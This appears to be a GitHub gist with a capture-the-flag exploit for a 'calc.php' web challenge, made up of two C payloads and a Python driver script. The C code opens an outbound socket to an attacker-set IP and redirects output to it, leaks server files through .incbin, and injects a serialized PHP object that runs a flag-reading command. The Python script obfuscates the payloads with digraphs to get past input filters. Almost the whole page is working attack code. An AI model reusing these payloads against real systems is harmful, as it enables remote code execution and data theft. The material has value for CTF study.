-
-
Save wupco/1cce4288483fdce10bf6fe2e12f625f2 to your computer and use it in GitHub Desktop.
Oneline Calc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
123; | |
return 123; | |
} | |
extern void *opendir(const char *); | |
extern void *readdir(void *); | |
extern void *shmat(int, const void *, int); | |
typedef struct { | |
ino_t d_ino; | |
off_t d_off; | |
unsigned short d_reclen; | |
unsigned char d_type; | |
char d_name[256]; | |
} dirent; | |
struct sockaddr { | |
unsigned short int sa_family; | |
char sa_data[14]; | |
}; | |
struct in_addr { | |
uint32_t s_addr; | |
}; | |
struct sockaddr_in { | |
unsigned short int sin_family; | |
unsigned short sin_port; | |
struct in_addr sin_addr; | |
char sin_zero[8]; | |
}; | |
int sock; | |
int data_send(char *data, int len) { | |
return send(sock, data, len, 0); | |
} | |
__attribute__((constructor)) void setup1() { | |
int r; | |
struct sockaddr_in sa; | |
memset(&sa, 0, sizeof(sa)); | |
sa.sin_family = 2; | |
sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */ | |
sa.sin_port = 0x901f; /* and port */ | |
sock = socket(2, 1, 0); | |
connect(sock, (struct sockaddr*)&sa, sizeof(sa)); | |
dup2(sock, 1); | |
} | |
__attribute__((constructor)) void f() { | |
void *dir = (void*)opendir("/tmp"); | |
void *de; | |
while (1) { | |
de = readdir(dir); | |
if (de == NULL) break; | |
char *s = ((dirent*)de)->d_name; | |
if (s[0] == 's' && strlen(s) == 7) { | |
char p[256]; | |
snprintf(p, 255, "/tmp/%s", s); | |
int id = shmget(ftok(p, 'a'), 0, 0); | |
int i = 0; | |
void *data = shmat(id, 0, 0); | |
void *var = data+64; | |
void *size = var-16; | |
char *payload = "__PAYLOAD__"; | |
if (*((uint64_t*)size) != 26) { | |
continue; | |
} | |
*((uint64_t*)size) = strlen(payload); | |
for (i = 0; i < *((uint64_t*)size); i++) { | |
((char*)var)[i] = payload[i]; | |
} | |
} | |
} | |
} | |
int g(){ | |
int res = 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
123; | |
} | |
__asm__(".section .rodata\n" | |
".global bin_start\n" | |
".type bin_start, @object\n" | |
".balign 16\n" | |
"bin_start:\n" | |
".incbin \"__PATH__\"\n" | |
".global bin_end\n" | |
".type bin_end, @object\n" | |
".balign 1\n" | |
"bin_end:\n" | |
".byte 0\n" | |
); | |
extern const __attribute__((aligned(16))) void *bin_start; | |
extern const void* bin_end; | |
struct sockaddr { | |
unsigned short int sa_family; | |
char sa_data[14]; | |
}; | |
struct in_addr { | |
uint32_t s_addr; | |
}; | |
struct sockaddr_in { | |
unsigned short int sin_family; | |
unsigned short sin_port; | |
struct in_addr sin_addr; | |
char sin_zero[8]; | |
}; | |
int sock; | |
int data_send(char *data, int len) { | |
return send(sock, data, len, 0); | |
} | |
__attribute__((constructor)) void setup1() { | |
int r; | |
struct sockaddr_in sa; | |
memset(&sa, 0, sizeof(sa)); | |
sa.sin_family = 2; | |
sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */ | |
sa.sin_port = 0x901f; /* and port */ | |
sock = socket(2, 1, 0); | |
connect(sock, (struct sockaddr*)&sa, sizeof(sa)); | |
dup2(sock, 1); | |
} | |
__attribute__((constructor)) void f() { | |
printf("%s\n", &bin_start); | |
} | |
int g(){ | |
int res = 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
url = 'http://galileo.local:10080/calc.php' | |
url = 'http://192.168.121.171:10080/calc.php' | |
url = 'http://localhost:10080/calc.php' | |
url = 'http://olc.chal.ctf.westerns.tokyo/calc.php' | |
# url = 'http://192.168.121.171/calc.php' | |
def exp(): | |
payload = open('exp.c', 'rb').read() | |
cmd = "/readflag2>/var/tmp/0j29fqj30f" | |
obj = 'a:2:{s:9:"__started";i:1;i:2;O:4:"Calc":3:{s:3:"bin";s:%d:"";%s;";s:3:"src";s:6:"abcdef";s:3:"tmp";R:4;}}' % (3 + len(cmd), cmd) | |
obj = obj.replace('{', '\\x7b').replace('}', '\\x7d').replace('"', '\\"') | |
payload = payload.replace('__PAYLOAD__', obj) | |
payload = payload.replace('{', '<%') | |
payload = payload.replace('}', '%>') | |
payload = payload.replace('#', '%:') | |
payload = payload.replace('\n', ' ') | |
req = requests.get(url, params={ | |
'formula': payload | |
}) | |
print(req.content) | |
def leak(path): | |
payload = open('leak.c', 'rb').read().replace('__PATH__', path) | |
payload = payload.replace('{', '<%') | |
payload = payload.replace('}', '%>') | |
payload = payload.replace('#', '%:') | |
payload = payload.replace('\n', ' ') | |
req = requests.get(url, params={ | |
'formula': payload | |
}) | |
print(req.content) | |
leak('./calc.php') | |
exp() | |
leak('/var/tmp/0j29fqj30f') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment